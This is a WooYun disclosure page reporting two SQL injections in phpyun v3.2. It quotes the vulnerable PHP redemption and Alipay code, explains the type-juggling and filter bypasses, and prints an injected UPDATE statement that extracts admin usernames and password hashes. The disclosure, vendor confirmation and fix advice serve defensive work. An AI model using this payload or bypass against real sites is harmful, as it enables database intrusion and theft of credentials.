当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088872

漏洞标题:phpyun v3.2 (20141226) 两处注入。

相关厂商:php云人才系统

漏洞作者: ′雨。

提交时间:2014-12-29 18:32

修复时间:2015-03-29 18:34

公开时间:2015-03-29 18:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-29: 细节已通知厂商并且等待厂商处理中
2014-12-29: 厂商已经确认,细节仅向厂商公开
2015-01-01: 细节向第三方安全合作伙伴开放
2015-02-22: 细节向核心白帽子及相关领域专家公开
2015-03-04: 细节向普通白帽子公开
2015-03-14: 细节向实习白帽子公开
2015-03-29: 细节向公众公开

简要描述:

最近更新日期(2014-12-26)
又更新了, 麻烦别再给5rank了 20走起可好。
一处是新的 一处算是绕过补丁了。
之前还有一两个没打补丁哦 加快速度把。

详细说明:

第一处 新发现的在兑换奖品的时候
在model/redeem.class.php中

function dh_action(){
$this->public_action();
if(!$this->uid && !$this->username)
{
$this->obj->ACT_layer_msg("您还没有登录,请先登录!",8,$_SERVER['HTTP_REFERER']);
}
if($_POST['submit']){
if(!$_POST['password']){
$this->obj->ACT_layer_msg("密码不能为空!",8,$_SERVER['HTTP_REFERER']);
}
if(!$_POST['linkman'] || !$_POST['linktel'] ){
$this->obj->ACT_layer_msg("联系人或联系电话不能为空!",8,$_SERVER['HTTP_REFERER']);
}
$info=$this->obj->DB_select_once("member","`uid`='".$this->uid."'","`password`,`salt`");
$passwrod=md5(md5($_POST['password']).$info['salt']);
if($info['password']!=$passwrod){
$this->obj->ACT_layer_msg("密码不正确!",8,$_SERVER['HTTP_REFERER']);
}
if(!$this->uid && !$this->username){
$this->obj->ACT_layer_msg("您还没有登录,请先登录!",8,$_SERVER['HTTP_REFERER']);
}else{
if($_POST['num']<1){
$this->obj->ACT_layer_msg("请填写正确的数量!",8,$_SERVER['HTTP_REFERER']);
}else{
if($_COOKIE['usertype']=="1"){
$table="member_statis";
}elseif($_COOKIE['usertype']=="2"){
$table="company_statis";
}elseif($_COOKIE['usertype']=="3"){
$table="lt_statis";
}elseif($_COOKIE['usertype']=="4"){
$table="px_train_statis";
}
$info=$this->obj->DB_select_once($table,"`uid`='".$this->uid."'","integral");
$gift=$this->obj->DB_select_once("reward","`id`='".(int)$_GET['id']."'");
if($_POST['num']>$gift['stock']){
$this->obj->ACT_layer_msg("已超出库存数量!",8,$_SERVER['HTTP_REFERER']);
}else{
if($gift['restriction']!="0"&&$_POST['num']>$gift['restriction']){
$this->obj->ACT_layer_msg("已超出限购数量!",8,$_SERVER['HTTP_REFERER']);
}else{
$integral=$gift['integral']*$_POST['num'];
if($info['integral']<$integral){
$this->obj->ACT_layer_msg("您的积分不足!",8,$_SERVER['HTTP_REFERER']);
}else{
$this->obj->company_invtal($this->uid,$integral,false,"积分兑换",true,2,'integral',24);
$value.="`uid`='".$this->uid."',";
$value.="`username`='".$this->username."',";
$value.="`usertype`='".$_COOKIE['usertype']."',";
$value.="`name`='".$gift['name']."',";
$value.="`gid`='".$gift['id']."',";
$value.="`linkman`='".$_POST['linkman']."',";
$value.="`linktel`='".$_POST['linktel']."',";
$value.="`body`='".$_POST['body']."',";
$value.="`integral`='".$integral."',";
$value.="`num`='".$_POST['num']."',";//这里被单引号了。
$value.="`ctime`='".time()."'";
$this->obj->DB_insert_once("change",$value);
$this->obj->DB_update_all("reward","`stock`=`stock`-".$_POST['num']."","`id`='".(int)$_GET['id']."'");//注意看这里 `stock`-".$_POST['num'] 直接把post来的带入到了查询当中 没有被单引号 再来看DB_update_all
$this->obj->ACT_layer_msg("兑换成功,请等待管理员审核!",9,$_SERVER['HTTP_REFERER']);
}
}
}
}
}
}



function DB_update_all($tablename, $value, $where = 1){
$SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE $where";
$this->db->query("set sql_mode=''");
$return=$this->db->query($SQL);
return $return;
}


查询查询
但是我们来看看$_POST['num'] 之前有啥处理没。
可以看到前面有三个比较。

if($_POST['num']<1){ //这里比较是否小于1 php弱语言 像1asdxx 都能过。
$this->obj->ACT_layer_msg("请填写正确的数量!",8,$_SERVER['HTTP_REFERER']);
}else{
if($_COOKIE['usertype']=="1"){
$table="member_statis";
}elseif($_COOKIE['usertype']=="2"){
$table="company_statis";
}elseif($_COOKIE['usertype']=="3"){
$table="lt_statis";
}elseif($_COOKIE['usertype']=="4"){
$table="px_train_statis";
}
$info=$this->obj->DB_select_once($table,"`uid`='".$this->uid."'","integral");
$gift=$this->obj->DB_select_once("reward","`id`='".(int)$_GET['id']."'");
if($_POST['num']>$gift['stock']){、//这里第二处比较 这里是把商品查询出来 看看他的库存。 然后与传递过来的num比较 所以这里我们num最好就为1 然后这里我先输出胰腺癌。 var_dump($_POST['num']>$gift['stock']);exit;
这里的库存为100. 发现如果我传递的num为1asd之类的时候 竟然true了。。 那么就失败了, 然后再继续测试 当传递的num为1+asd就返回false 意味着成功了。 那么这里我们就添加一个加号。
$this->obj->ACT_layer_msg("已超出库存数量!",8,$_SERVER['HTTP_REFERER']);
}else{
if($gift['restriction']!="0"&&$_POST['num']>$gift['restriction']){
$this->obj->ACT_layer_msg("已超出限购数量!",8,$_SERVER['HTTP_REFERER']);
}else{


1.jpg


2.jpg


那么我们就能绕过这个判断了。

3.jpg


UPDATE `phpyun_reward` SET `stock`=`stock`-1+1,name=(select concat(username,0x23,password) from php_admin_user) WHERE `id`='1'
此时执行的语句

4.jpg


这里随便说一下 补丁解决泄漏key的那个方法太渣了把。。
很轻松的就绕过去了。 这里不多说, 简直。。
第二处在 api\alipay\alipayto.php

require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");
require_once(dirname(dirname(dirname(__FILE__)))."/data/db.safety.php");//添加了过滤的进来。
require_once(dirname(dirname(dirname(__FILE__)))."/plus/config.php");
require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");
$db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);
if(!is_numeric($_POST['dingdan'])){die;}

$_COOKIE['uid']=(int)$_COOKIE['uid'];
$_POST['is_invoice']=(int)$_POST['is_invoice'];
$_POST['balance']=(int)$_POST['balance'];
$member_sql=$db->query("SELECT * FROM `".$db_config["def"]."member` WHERE `uid`='".$_COOKIE['uid']."' limit 1");
$member=mysql_fetch_array($member_sql);
if($member['username'] != $_COOKIE['username'] || $member['usertype'] != $_COOKIE['usertype']||md5($member['username'].$member['password'].$member['salt'])!=$_COOKIE['shell']){
echo '登录信息验证错误,请重新登录!';die;
}
$sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='".$_POST['dingdan']."' AND `order_price`>=0");
$row=mysql_fetch_array($sql);
if(!$row['uid'] || $row['uid']!=$_COOKIE['uid'])
{
die;
}
if((int)$_POST['is_invoice']=='1'&&$config["sy_com_invoice"]){
$invoice_title=",`is_invoice`='".$_POST['is_invoice']."'";
if($_POST['linkway']=='1'){
$com_sql=$db->query("select `linkman`,`linktel`,`address` from `".$db_config["def"]."company` where `uid`='".$_COOKIE['uid']."'");//查询余额
$company=mysql_fetch_array($com_sql);
$link=",'".$company['linkman']."','".$company['linktel']."','".$company['address']."'";
$up_record=",`link_man`='".$company['linkman']."',`link_moblie`='".$company['linktel']."',`address`='".$company['address']."'";
}else{
$link=",'".$_POST['link_man']."','".$_POST['link_moblie']."','".$_POST['address']."'";
$up_record=",`link_man`='".$_POST['link_man']."',`link_moblie`='".$_POST['link_moblie']."',`address`='".$_POST['address']."'";
}
$record_sql=$db->query("select `id` from `".$db_config["def"]."invoice_record` where `order_id`='".$_POST['dingdan']."' and `uid`='".$_COOKIE['uid']."'");
$record=mysql_fetch_array($record_sql);
if($record['id']){
$upr_sql=$db->query("update `".$db_config["def"]."invoice_record` set `title`='".trim($_POST['invoice_title'])."',`status`='0',`addtime`='".time()."'".$up_record." where `id`='".$record['id']."'");
mysql_fetch_array($upr_sql);


可以看到 data/db.safety.php 把过滤文件添加进来了。
那么这里的$_POST我们就不能引入单引号了。
但是。。

if($_POST['linkway']=='1'){
$com_sql=$db->query("select `linkman`,`linktel`,`address` from `".$db_config["def"]."company` where `uid`='".$_COOKIE['uid']."'");//查询余额
$company=mysql_fetch_array($com_sql);
$link=",'".$company['linkman']."','".$company['linktel']."','".$company['address']."'";//当linkway为1的时候 这里拼接的是出库来的 。。
$up_record=",`link_man`='".$company['linkman']."',`link_moblie`='".$company['linktel']."',`address`='".$company['address']."'";
}else{
$link=",'".$_POST['link_man']."','".$_POST['link_moblie']."','".$_POST['address']."'";
$up_record=",`link_man`='".$_POST['link_man']."',`link_moblie`='".$_POST['link_moblie']."',`address`='".$_POST['address']."'";
}


首先编辑自己的企业信息 把safekey加进去。

6.jpg


这里我直接把语句数出来了。

7.jpg


漏洞证明:

4.jpg

修复方案:

第一个用pylode
第二个对出库的addslashes一次。

版权声明:转载请注明来源 ′雨。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-29 18:59

厂商回复:

感谢您的提供!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-29 21:59 | 世纪缘 ( 路人 | Rank:2 漏洞数:3 | 专注无线网络安全!)

    说好的rank20起步!